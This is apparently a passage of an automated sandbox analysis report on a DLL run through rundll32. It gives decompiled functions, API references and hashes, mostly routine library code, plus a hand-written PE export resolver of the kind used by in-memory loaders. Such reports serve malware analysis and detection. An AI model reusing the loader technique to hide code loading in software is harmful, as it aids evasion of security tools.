				_t30 = RegOpenKeyA(_t44,  *_t54, _t59 - 0x18);
				_t57 = _t30;
				if(_t30 == 0) {
					while(1) {
						_t34 = RegEnumKeyA( *(_t59 - 0x18), 0, _t59, 0x104);
						_t57 = _t34;
						_t66 = _t57;
						if(_t57 != 0) {
							break;
						}
						 *(_t59 - 4) =  *(_t59 - 4) & _t34;
						_push(_t59);
						E10009FA3(_t42, _t59 - 0x14, _t54, _t57, _t66);
						 *(_t59 - 4) = 1;
						_t57 = E1000BC89(_t42, _t54, _t57, _t66,  *(_t59 - 0x18), _t59 - 0x14);
						_t42 = _t42 & 0xffffff00 | _t57 != 0x00000000;
						 *(_t59 - 4) = 0;
						E10009CB7( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
						if(_t42 == 0) {
							 *(_t59 - 4) =  *(_t59 - 4) | 0xffffffff;
							continue;
						}
						break;
					}
					__eflags = _t57 - 0x103;
					if(_t57 == 0x103) {
						L6:
						_t57 = RegDeleteKeyA( *(_t59 - 0x20),  *_t54);
					} else {
						__eflags = _t57 - 0x3f2;
						if(_t57 == 0x3f2) {
							goto L6;
						}
					}
					RegCloseKey( *(_t59 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				_pop(_t55);
				_pop(_t58);
				_pop(_t43);
				_t32 = E100167D5(_t57, _t43, _t59[0x108] ^ _t59, _t52, _t55, _t58);
				__eflags =  &(_t59[0x10c]);
				return _t32;
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 1000BCA8
RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1000BCC7
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 1000BCE5
RegDeleteKeyA.ADVAPI32(?,?), ref: 1000BD60
RegCloseKey.ADVAPI32(?), ref: 1000BD6B

Part of subcall function 10009FA3: __EH_prolog3.LIBCMT ref: 10009FAA

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CloseDeleteEnumH_prolog3H_prolog3_catchOpen
String ID:
API String ID: 301487041-0
Opcode ID: 39e7eb00d6dc938df27b9e03ef33bae49a28eb95fe07434f2e98046a2569245b
Instruction ID: 653bf45c983c6aa9a2c45ec2c29e65d920d70d1e6a7a13c67c9db93679124605
Opcode Fuzzy Hash: 39e7eb00d6dc938df27b9e03ef33bae49a28eb95fe07434f2e98046a2569245b
Instruction Fuzzy Hash: 0921A075D0465A9FEB21DF94CC81AEDB7B0FF04390F104126ED55A7290EB705E44DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10013F9E, Relevance: 7.6, APIs: 5, Instructions: 53
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10013F9E(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
				signed int _v8;
				char _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HWND__* _t21;
				void* _t22;
				intOrPtr _t25;
				void* _t26;
				int _t27;
				CHAR* _t28;
				signed int _t29;

				_t25 = __edx;
				_t22 = __ecx;
				_t9 =  *0x10057a08; // 0xcbf72908
				_v8 = _t9 ^ _t29;
				_t21 = _a4;
				_t32 = _t21;
				_t28 = _a8;
				if(_t21 == 0) {
					L1:
					E1000A0DB(_t21, _t22, _t26, _t28, _t32);
				}
				if(_t28 == 0) {
					goto L1;
				}
				_t27 = lstrlenA(_t28);
				_v264 = 0;
				E100174D0(_t27,  &_v263, 0, 0xff);
				if(_t27 > 0x100 || GetWindowTextA(_t21,  &_v264, 0x100) != _t27 || lstrcmpA( &_v264, _t28) != 0) {
					_t16 = SetWindowTextA(_t21, _t28);
				}
				return E100167D5(_t16, _t21, _v8 ^ _t29, _t25, _t27, _t28);
			}

APIs

lstrlenA.KERNEL32(?,?,00000000), ref: 10013FC8
_memset.LIBCMT ref: 10013FE5
GetWindowTextA.USER32 ref: 10013FFF
lstrcmpA.KERNEL32(00000000,?), ref: 10014011
SetWindowTextA.USER32(?,?), ref: 1001401D

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
String ID:
API String ID: 4273134663-0
Opcode ID: 2b79ff425e09df3a26b2ab50ef16ba7c17b80cb00167e4224560e412a4786cd9
Instruction ID: fa7108181993de9b8ea87dd6eaa7291c2451852d429ff63cadea9d36e3b3e8b2
Opcode Fuzzy Hash: 2b79ff425e09df3a26b2ab50ef16ba7c17b80cb00167e4224560e412a4786cd9
Instruction Fuzzy Hash: 3901C0B6A00228ABE711DB65DCC4FDF77ACEF18790F110065EA45D7141DA70DE848BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10010C0F, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E10010C0F(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* __esi;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t28;

				_t28 = __eflags;
				_t24 = __edi;
				_t21 = __ebx;
				E1001431B(__ebx, _t25, __ebp, 0xc);
				_push(E100100DE);
				_t26 = E100139F5(__ebx, 0x1005a8e0, __edi, _t25, _t28);
				_t29 = _t26;
				if(_t26 == 0) {
					E1000A0DB(_t21, 0x1005a8e0, __edi, _t26, _t29);
				}
				_t30 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E10014388(0xc);
					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
				} else {
					_push("hhctrl.ocx");
					_t16 = E1000E725(_t21, 0x1005a8e0, _t24, _t26, _t30);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpA");
						__eflags = _t17;
						 *(_t26 + 8) = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}

APIs

Part of subcall function 1001431B: EnterCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014357
Part of subcall function 1001431B: InitializeCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014366
Part of subcall function 1001431B: LeaveCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014373
Part of subcall function 1001431B: EnterCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 1001437F

Part of subcall function 100139F5: __EH_prolog3_catch.LIBCMT ref: 100139FC

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 10010C53
FreeLibrary.KERNEL32(?), ref: 10010C63

Strings

HtmlHelpA, xrefs: 10010C4D
hhctrl.ocx, xrefs: 10010C37

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 2853499158-63838506
Opcode ID: 70501895dbc1ad2a0e808d427635024ad07f3595ed01fbc2665ff07db8d8f757
Instruction ID: 8873b40b3358b87e9332ca8c9146562190e137befea279647b799a71fcd87530
Opcode Fuzzy Hash: 70501895dbc1ad2a0e808d427635024ad07f3595ed01fbc2665ff07db8d8f757
Instruction Fuzzy Hash: 7001F431204303DFE321DFA1DE05B4A76E0EF05781F018A08F4DAA8061DBB1D8D0DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 100224E9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E100224E9() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x1002bb98;
					_v28 =  *0x1002bb90;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32,1001A130), ref: 100224EE
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 100224FE

Strings

KERNEL32, xrefs: 100224E9
IsProcessorFeaturePresent, xrefs: 100224F8

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 3c78fa25cbee28e165ffdeda389deaa1f92564da871b159ff165506123a88fa1
Instruction ID: b1380c49f8d15cda8b98f9f56e3724ed638b8beb480886d8724856f67b077174
Opcode Fuzzy Hash: 3c78fa25cbee28e165ffdeda389deaa1f92564da871b159ff165506123a88fa1
Instruction Fuzzy Hash: EDF03030900D1EE2EF00ABE1BC596AF7A78FB44785FD20490E681B0088DF7181718681

Uniqueness

Uniqueness Score: -1.00%

Function 10002D50, Relevance: 6.4, APIs: 5, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10002D50(intOrPtr __ecx, intOrPtr* _a4, signed int _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr* _v32;
				signed short* _v36;
				intOrPtr _v40;
				void* _t79;
				void* _t119;

				_v40 = __ecx;
				_v20 =  *((intOrPtr*)(_a4 + 4));
				_v12 = 0;
				_v16 =  *_a4 + 0x78;
				if( *((intOrPtr*)(_v16 + 4)) != 0) {
					_v8 = _v20 +  *_v16;
					if( *((intOrPtr*)(_v8 + 0x18)) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
						SetLastError(0x7f);
						return 0;
					} else {
						if((_a8 >> 0x00000010 & 0x0000ffff) != 0) {
							_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x20));
							_v36 = _v20 +  *((intOrPtr*)(_v8 + 0x24));
							_v24 = 0;
							_v28 = 0;
							while(_v28 <  *((intOrPtr*)(_v8 + 0x18))) {
								_t79 = E10001F70(_a8, _v20 +  *_v32);
								_t119 = _t119 + 8;
								if(_t79 != 0) {
									_v28 = _v28 + 1;
									_v32 = _v32 + 4;
									_v36 =  &(_v36[1]);
									continue;
								}
								_v12 =  *_v36 & 0x0000ffff;
								_v24 = 1;
								break;
							}
							if(_v24 != 0) {
								L17:
								if(_v12 <=  *((intOrPtr*)(_v8 + 0x14))) {
									return _v20 +  *((intOrPtr*)(_v20 +  *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4));
								}
								SetLastError(0x7f);
								return 0;
							}
							SetLastError(0x7f);
							return 0;
						}
						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
							_v12 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
							goto L17;
						}
						SetLastError(0x7f);
						return 0;
					}
				}
				SetLastError(0x7f);
				return 0;
			}

APIs

SetLastError.KERNEL32(0000007F), ref: 10002D7F
SetLastError.KERNEL32(0000007F), ref: 10002DAB

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 4d3452531a7c5fa1c81c99bf09ef5018cf44bb84df21a50ba64e81c18ec72dd0
Instruction ID: 028074866867044f4bb64f701422ec5252acdb94d91fdee864382ef112f730bb
Opcode Fuzzy Hash: 4d3452531a7c5fa1c81c99bf09ef5018cf44bb84df21a50ba64e81c18ec72dd0
Instruction Fuzzy Hash: F7510570A4415AEFEF04CF94C880AAEB7F1FF48384F608569D855AB349D734EA41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10023E83, Relevance: 6.1, APIs: 4, Instructions: 101
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10023E83(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E10016E2B( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E1001E243( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E10017D62(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10023EB3
__isleadbyte_l.LIBCMT ref: 10023EE7
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,10022C1D,?,?,00000002), ref: 10023F18
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,10022C1D,?,?,00000002), ref: 10023F86

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 9fecb1cfdfc7269cf4ddeba3d560e390ad46f881d90bbc81769201c589544707
Instruction ID: bc0a73e0192d900c1d89498958e44598309ec6eeb61669affd2269eacaf1277d
Opcode Fuzzy Hash: 9fecb1cfdfc7269cf4ddeba3d560e390ad46f881d90bbc81769201c589544707
Instruction Fuzzy Hash: EA319931A0028AEFDF50DFA4E891AAE7BF9EF00251F92C5A9F4648B191D330E944DB50

Uniqueness

Uniqueness Score: -1.00%

Function 100145B9, Relevance: 6.1, APIs: 4, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E100145B9(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t39;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;
				void* _t51;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				void* _t68;
				void* _t70;

				_t65 = __edi;
				_t64 = __edx;
				_t51 = E1000D61F(_t50, __ecx, __edi, _t68, __eflags);
				_t29 =  *((intOrPtr*)(_t51 + 0x10));
				if(_t29 == 0) {
					L19:
					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
				}
				_t32 = _t29 - 1;
				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
				if(_t32 != 0) {
					goto L19;
				}
				if(_a4 == 0) {
					L8:
					_push(_t65);
					_t66 =  *((intOrPtr*)(E1000D5EC(_t51, _t65, 0, _t77) + 4));
					_t70 = E100139DB(0x10058f44);
					if(_t70 == 0 || _t66 == 0) {
						L18:
						goto L19;
					} else {
						_t35 =  *((intOrPtr*)(_t70 + 0xc));
						_t80 = _t35;
						if(_t35 == 0) {
							L12:
							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
								_t36 =  *((intOrPtr*)(_t70 + 0xc));
								_a4 = _a4 & 0x00000000;
								_t83 = _t36;
								if(_t36 != 0) {
									_push(_t36);
									_t39 = E1001A023(_t51, _t64, _t66, _t70, _t83);
									_push( *((intOrPtr*)(_t70 + 0xc)));
									_a4 = _t39;
									E10016380(_t51, _t66, _t70, _t83);
								}
								_t37 = E1001703B(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
								if(_t37 == 0 && _a4 != _t37) {
									 *((intOrPtr*)(_t70 + 0xc)) = E1001703B(_t51, _t64, _t66, _t70, _a4);
								}
							}
							goto L18;
						}
						_push(_t35);
						if(E1001A023(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
							goto L18;
						}
						goto L12;
					}
				}
				if(_a4 != 0xffffffff) {
					_t47 = E1000B510();
					if(_t47 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
						_t77 = _t48;
						if(_t48 != 0) {
							 *_t48(0, 0);
						}
					}
				}
				E100144ED( *((intOrPtr*)(_t51 + 0x20)), _t65);
				E100144ED( *((intOrPtr*)(_t51 + 0x1c)), _t65);
				E100144ED( *((intOrPtr*)(_t51 + 0x18)), _t65);
				E100144ED( *((intOrPtr*)(_t51 + 0x14)), _t65);
				E100144ED( *((intOrPtr*)(_t51 + 0x24)), _t65);
				goto L8;
			}

APIs

__msize.LIBCMT ref: 1001464A
__msize.LIBCMT ref: 1001466D
_malloc.LIBCMT ref: 10014685
_malloc.LIBCMT ref: 1001469A

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: f4a42d07282e480ba19c61c33f8d9b2ab7007992bfdb09378e69a2fee1890d3d
Instruction ID: c51f58ba7030090f65d8388f2f6216d6b95cef8c4540db251b535ec9dede0d79
Opcode Fuzzy Hash: f4a42d07282e480ba19c61c33f8d9b2ab7007992bfdb09378e69a2fee1890d3d
Instruction Fuzzy Hash: 2E21F375500A019FCB55DF34D881B5A73E4FF05298B22842AE869DF266DF30ECC1CB82

Uniqueness

Uniqueness Score: -1.00%

Function 10009D34, Relevance: 6.1, APIs: 4, Instructions: 58
windowCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 87%

			E10009D34(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
				intOrPtr* _v0;
				void* _v4;
				signed int _v8;
				intOrPtr _v16;
				void* _t20;
				intOrPtr* _t23;
				void* _t29;
				void* _t31;
				intOrPtr _t35;
				char _t36;
				void* _t40;
				void* _t42;
				void* _t44;

				_t44 = __eflags;
				_t38 = __esi;
				_t37 = __edi;
				_t31 = __ebx;
				_push(4);
				E10017BC1(E10027DA5, __ebx, __edi, __esi);
				_t35 = E10009B91(_t44, 0xc);
				_v16 = _t35;
				_t20 = 0;
				_v4 = 0;
				if(_t35 != 0) {
					_t20 = E10009CDE(_t35);
				}
				_t36 = _a4;
				_v8 = _v8 | 0xffffffff;
				 *((intOrPtr*)(_t20 + 8)) = _t36;
				_a4 = _t20;
				E10017C83( &_a4, 0x1002e16c);
				asm("int3");
				_t40 = _t42;
				_t23 = _v0;
				_push(_t31);
				if(_t23 != 0) {
					 *_t23 = 0;
				}
				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
					E10009C0D(0, _t36, _t37, _t38, _t40, _a4, _a8, _a12, 0xffffffff);
					LocalFree(_a12);
					_t29 = 1;
					__eflags = 1;
				} else {
					 *_a4 = 0;
					_t29 = 0;
				}
				return _t29;
			}

APIs

__EH_prolog3.LIBCMT ref: 10009D3B

Part of subcall function 10009B91: _malloc.LIBCMT ref: 10009BAB

__CxxThrowException@8.LIBCMT ref: 10009D71
FormatMessageA.KERNEL32(00001100,00000000,8007000E,00000800,?,00000000,00000000,?,?,8007000E,1002E16C,00000004,1000105C,8007000E), ref: 10009D9A

Part of subcall function 10009C0D: _wctomb_s.LIBCMT ref: 10009C1D

LocalFree.KERNEL32(?), ref: 10009DC3

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
String ID:
API String ID: 1615547351-0
Opcode ID: e381bce633557ad048b1696ea26053178c542294b2cd97fac3bd263aaafec7a1
Instruction ID: 2087144037a306e6c8b96e697859ee983d4da7c50e84c085b7e4f49f0a09e647
Opcode Fuzzy Hash: e381bce633557ad048b1696ea26053178c542294b2cd97fac3bd263aaafec7a1
Instruction Fuzzy Hash: 1E1170B1644249AFEB00DFA4DC81DAE3BA9FB04390F21452AF629CA1D1D731D9508B51

Uniqueness

Uniqueness Score: -1.00%

Function 1000C887, Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E1000C887(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t23;
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed int _t34;
				signed short _t35;
				void* _t37;
				signed short* _t40;

				_push(__ecx);
				_push(_t28);
				_t37 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x58));
				_t40 =  *(__ecx + 0x60);
				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t32 =  *(E1000D5EC(_t28, __ecx, _t40, _t42) + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
				}
				if(_v8 != 0) {
					_t40 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t40 != 0) {
					_t35 =  *_t40;
					if(_t40[1] != 0xffff) {
						_t23 = _t40[5] & 0x0000ffff;
						_t34 = _t40[6] & 0x0000ffff;
					} else {
						_t35 = _t40[6];
						_t23 = _t40[9] & 0x0000ffff;
						_t34 = _t40[0xa] & 0x0000ffff;
					}
					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t37 + 0x58) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 1000C8AD
LoadResource.KERNEL32(?,00000000), ref: 1000C8B5
LockResource.KERNEL32(00000000), ref: 1000C8C7
